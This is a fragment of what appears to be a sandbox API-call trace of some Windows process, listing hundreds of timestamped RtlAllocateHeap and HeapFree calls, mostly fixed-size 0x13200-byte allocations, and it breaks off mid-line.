[0093.015] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x8) returned 0x488ce0 [0093.015] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x4d7260 [0093.015] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x499260 [0093.015] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x488ce0 | out: hHeap=0x480000) returned 1 [0093.015] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x4ea470 [0093.016] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x18) returned 0x499040 [0093.016] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x499260 | out: hHeap=0x480000) returned 1 [0093.016] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x4fd680 [0093.016] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x20) returned 0x48b720 [0093.016] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x499040 | out: hHeap=0x480000) returned 1 [0093.016] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x510890 [0093.017] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x30) returned 0x498170 [0093.017] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x48b720 | out: hHeap=0x480000) returned 1 [0093.017] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x523aa0 [0093.017] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x536cb0 [0093.018] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x48) returned 0x4903e0 [0093.018] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x498170 | out: hHeap=0x480000) returned 1 [0093.018] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x549ec0 [0093.018] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x55d0d0 [0093.019] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1e60080 [0093.019] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x68) returned 0x488ce0 [0093.019] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4903e0 | out: hHeap=0x480000) returned 1 [0093.019] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1e73290 [0093.020] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1e864a0 [0093.020] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1e996b0 [0093.020] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1eac8c0 [0093.022] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x98) returned 0x485090 [0093.022] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x488ce0 | out: hHeap=0x480000) returned 1 [0093.022] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1ebfad0 [0093.022] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1ed2ce0 [0093.023] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1ee5ef0 [0093.023] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1ef9100 [0093.024] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1f0c310 [0093.024] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1f1f520 [0093.250] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xe0) returned 0x488ce0 [0093.250] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x485090 | out: hHeap=0x480000) returned 1 [0093.250] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1f32730 [0093.251] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1f60080 [0093.251] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1f73290 [0093.252] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1f864a0 [0093.252] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1f996b0 [0093.253] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1fac8c0 [0093.253] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1fbfad0 [0093.254] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1fd2ce0 [0093.254] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1fe5ef0 [0093.255] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x150) returned 0x48b090 [0093.255] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x488ce0 | out: hHeap=0x480000) returned 1 [0093.255] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1ff9100 [0093.256] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x200c310 [0093.256] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x201f520 [0093.257] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2032730 [0093.257] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2045940 [0093.258] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2058b50 [0093.258] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x206bd60 [0093.258] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x207ef70 [0093.259] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2092180 [0093.259] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x20a5390 [0093.260] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x20b85a0 [0093.260] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x20cb7b0 [0093.261] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x20de9c0 [0093.261] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x20f1bd0 [0093.261] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1f8) returned 0x4988f0 [0093.261] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x48b090 | out: hHeap=0x480000) returned 1 [0093.261] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2104de0 [0093.262] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2117ff0 [0093.262] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x212b200 [0093.263] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x213e410 [0093.263] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2160080 [0093.264] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2173290 [0093.264] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x21864a0 [0093.265] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x21996b0 [0093.265] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x21ac8c0 [0093.266] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x21bfad0 [0093.266] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x21d2ce0 [0093.267] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x21e5ef0 [0093.267] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x21f9100 [0093.268] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x220c310 [0093.268] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x221f520 [0093.269] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2232730 [0093.269] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2245940 [0093.270] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2258b50 [0093.270] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x226bd60 [0093.270] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x227ef70 [0093.271] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2292180 [0093.271] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x2f0) returned 0x498af0 [0093.271] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4988f0 | out: hHeap=0x480000) returned 1 [0093.271] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x22a5390 [0093.272] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x22b85a0 [0093.272] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x22cb7b0 [0093.272] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x22de9c0 [0093.273] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x22f1bd0 [0093.273] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2304de0 [0093.273] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2317ff0 [0093.274] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x232b200 [0093.274] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x233e410 [0093.275] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2351620 [0093.275] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2364830 [0093.276] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2377a40 [0093.276] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x238ac50 [0093.277] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x239de60 [0093.277] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x23b1070 [0093.278] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x23c4280 [0093.278] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x23d7490 [0093.279] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x23ea6a0 [0093.279] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x23fd8b0 [0093.279] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2410ac0 [0093.280] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2423cd0 [0093.280] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2436ee0 [0093.281] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x244a0f0 [0093.281] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x245d300 [0093.282] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2470510 [0093.282] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2483720 [0093.282] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2496930 [0093.283] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x24a9b40 [0093.283] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x24bcd50 [0093.283] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x24cff60 [0093.284] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x24e3170 [0093.284] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x468) returned 0x4ac5d0 [0093.284] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x498af0 | out: hHeap=0x480000) returned 1 [0093.284] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x24f6380 [0093.285] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2509590 [0093.480] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x251c7a0 [0093.481] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x252f9b0 [0093.481] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2542bc0 [0093.482] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2560080 [0093.483] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2573290 [0093.483] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x25864a0 [0093.483] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x25996b0 [0093.484] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x25ac8c0 [0093.484] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x25bfad0 [0093.485] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x25d2ce0 [0093.485] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x25e5ef0 [0093.486] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x25f9100 [0093.486] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x260c310 [0093.487] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x261f520 [0093.487] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2632730 [0093.488] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2645940 [0093.488] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2658b50 [0093.489] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x266bd60 [0093.489] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x267ef70 [0093.490] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2692180 [0093.490] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x26a5390 [0093.491] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x26b85a0 [0093.491] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x26cb7b0 [0093.492] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x26de9c0 [0093.492] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x26f1bd0 [0093.492] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2704de0 [0093.493] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2717ff0 [0093.493] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x272b200 [0093.494] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x273e410 [0093.494] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2751620 [0093.495] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2764830 [0093.495] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2777a40 [0093.496] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x278ac50 [0093.496] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x279de60 [0093.496] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x27b1070 [0093.497] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x27c4280 [0093.497] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x27d7490 [0093.498] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x27ea6a0 [0093.498] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x27fd8b0 [0093.499] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2810ac0 [0093.499] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2823cd0 [0093.500] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2836ee0 [0093.500] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x284a0f0 [0093.500] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x285d300 [0093.501] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2870510 [0093.501] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x698) returned 0x4988f0 [0093.501] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4ac5d0 | out: hHeap=0x480000) returned 1 [0093.501] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2883720 [0093.502] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2896930 [0093.502] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x28a9b40 [0093.502] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x28bcd50 [0093.503] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x28cff60 [0093.503] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x28e3170 [0093.504] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x28f6380 [0093.504] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2909590 [0093.505] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x291c7a0 [0093.505] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x292f9b0 [0093.505] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2942bc0 [0093.506] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2955dd0 [0093.507] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2968fe0 [0093.507] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x297c1f0 [0093.508] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x298f400 [0093.509] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x29a2610 [0093.510] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x29b5820 [0093.510] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x29c8a30 [0093.510] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x29dbc40 [0093.511] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x29eee50 [0093.511] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2a02060 [0093.512] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2a15270 [0093.512] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2a28480 [0093.513] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2a3b690 [0093.513] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2a4e8a0 [0093.514] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2a61ab0 [0093.514] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2a74cc0 [0093.514] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2a87ed0 [0093.514] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2a9b0e0 [0093.515] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2aae2f0 [0093.515] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2ac1500 [0093.772] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2ad4710 [0093.772] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2ae7920 [0093.773] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2afab30 [0093.773] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2b0dd40 [0093.774] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2b20f50 [0093.774] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2b34160 [0093.774] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2b47370 [0093.775] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2b5a580 [0093.775] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2b6d790 [0093.776] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2b809a0 [0093.776] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2b93bb0 [0093.776] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2ba6dc0 [0093.777] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2bb9fd0 [0093.777] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2bcd1e0 [0093.778] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2be03f0 [0093.778] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2bf3600 [0093.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2c06810 [0093.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2c19a20 [0093.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2c2cc30 [0093.780] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2c3fe40 [0093.780] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2c53050 [0093.780] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2c66260 [0093.781] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2c79470 [0093.781] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2c8c680 [0093.782] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2c9f890 [0093.782] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2cb2aa0 [0093.783] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2cc5cb0 [0093.783] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2cd8ec0 [0093.784] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2cec0d0 [0093.784] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2cff2e0 [0093.785] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2d124f0 [0093.785] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2d25700 [0093.786] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2d38910 [0093.786] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2d60080 [0093.787] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2d73290 [0093.788] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2d864a0 [0093.788] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2d996b0 [0093.789] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2dac8c0 [0093.789] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2dbfad0 [0093.789] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x9e0) returned 0x4ac5d0 [0093.789] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4988f0 | out: hHeap=0x480000) returned 1 [0093.789] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2dd2ce0 [0093.790] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2de5ef0 [0093.790] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2df9100 [0093.791] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2e0c310 [0093.791] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2e1f520 [0093.791] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2e32730 [0093.792] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2e45940 [0093.792] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2e58b50 [0093.794] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2e6bd60 [0093.795] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2e7ef70 [0093.795] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2e92180 [0093.795] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2ea5390 [0093.796] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2eb85a0 [0093.796] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2ecb7b0 [0093.797] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2ede9c0 [0094.006] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4ac5d0 | out: hHeap=0x480000) returned 1 [0102.855] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4b7460 | out: hHeap=0x480000) returned 1 [0102.855] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4d7260 | out: hHeap=0x480000) returned 1 [0102.855] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4ea470 | out: hHeap=0x480000) returned 1 [0102.855] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4fd680 | out: hHeap=0x480000) returned 1 [0102.855] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x510890 | out: hHeap=0x480000) returned 1 [0102.855] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x523aa0 | out: hHeap=0x480000) returned 1 [0102.855] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x536cb0 | out: hHeap=0x480000) returned 1 [0102.855] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x549ec0 | out: hHeap=0x480000) returned 1 [0102.855] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x55d0d0 | out: hHeap=0x480000) returned 1 [0102.855] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1e60080 | out: hHeap=0x480000) returned 1 [0102.855] HeapFree (in: hHeap=0x480000, 